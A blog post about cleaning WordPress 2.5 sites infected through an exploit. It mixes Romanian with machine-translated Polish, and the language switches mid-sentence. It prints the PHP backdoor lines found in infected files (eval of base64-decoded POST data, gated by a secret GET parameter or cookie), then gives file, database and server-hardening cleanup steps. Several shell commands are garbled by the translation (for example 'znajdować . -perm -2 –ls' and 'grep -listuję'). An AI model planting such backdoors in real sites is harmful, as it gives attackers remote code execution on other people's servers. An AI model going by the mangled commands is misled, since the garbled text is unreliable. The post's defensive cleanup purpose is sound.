Inainte sa cititi acest post, trebuie sa vedeti post tutaj, ca sa intelegeti ceva. :)

Am gasit in mai multe fisiere ale blogurilor de pe stealthsettings.com, coduri asemanatoare cu cele de mai jos, aparute ca urmare a virusarii cu exploitul de WordPress.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file’])); exit; } ?>

i

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

In cazul de mai sus este vorba despre fisierul xmlrpc.php z Senny, dar la un grep pe server, se vede ca sunt destul de multe coduri de acest gen in surse.

Curatare fisiere infectate:

Ooookkkk…
1. Cea mai buna solutie, dupa ce este facut kopia zapasowa-ul si curatata baza de date, este sa USUWAĆ fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”

3. in /tmp , wyszukaj i usuń foldery takie jak tmpYwbzT2

Oczyszczanie SQL :

1. w tabeli tabela WP_Options sprawdź, czy istnieje i usuń linie: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 i opcje_wordpress.

2. Również w wp_options przejdź do aktywne_wtyczki i usuń, jeśli istnieje, wtyczkę kończącą się na jednym z rozszerzeń *_new.php, *_old.php, *.jpgg, *.giff, *.pngg lub jeśli jest to inne podejrzane rozszerzenie, sprawdź dokładnie.

3. W tabeli wp_użytkownicy, sprawdź, czy po prawej stronie kolumny nie ma użytkownika, który nie ma nic zapisanego nazwa_użytkownika. Usuń tego użytkownika, ale zapamiętaj numer w kolumnie ID. Ten użytkownik prawdopodobnie będzie używał „WordPress” jako login_użytkownika i wygląda na to, że został utworzony w dniu 00:00:00 0000-00-00.

4. Podejdź do stołu wp_usermeta i usuń wszystkie linie należące do powyższego identyfikatora.

Dupa ce ati facut aceasta curatare de sql, dezactivati si apoi activati un plugin oarecare. (in blog –> Panel -> Plugins)

Securizare server:

1. Vedeti ce directoare si fisiere sunt “writable” (chmod 777) si incercati sa puneti pe ele un chmod care sa nu mai permita scrierea lor de la orice nivel. (chmod 644, de exemplu)

znajdować . -perm -2 –ls

2. Vedeti ce fisiere au setat bit-ul suid lub sgid . Daca nu utilizati acele fisiere puneti pe ele chmod 0 sau dezinstalati pachetul care le contine. Sunt foarte periculoase, pentru ca ele executa cu privilegiile “grupa"Lub"źródło” si nu cu privilegiile utilizatorului normal care executa acel fisier.

find / -type f -perm -04000 -ls
find / -type f -perm -02000 -ls

3. Sprawdź, które porty są otwarte i spróbuj zamknąć lub zabezpieczyć te, które nie są używane.

netstat -an | grep -listuję

To tyle. Widzę to niektóre blogi są zakazane przez wyszukiwarkę Google, a inni mówią „Dobra robota!!!” . Cóż, zrobiłbym to dla nich… ale co powiesz, jeśli Google zacznie banować wszystkie witryny kto to robi SPAMUJĘ i pakuje trojany (Trojan.Clicker.HTML) w ciasteczkach?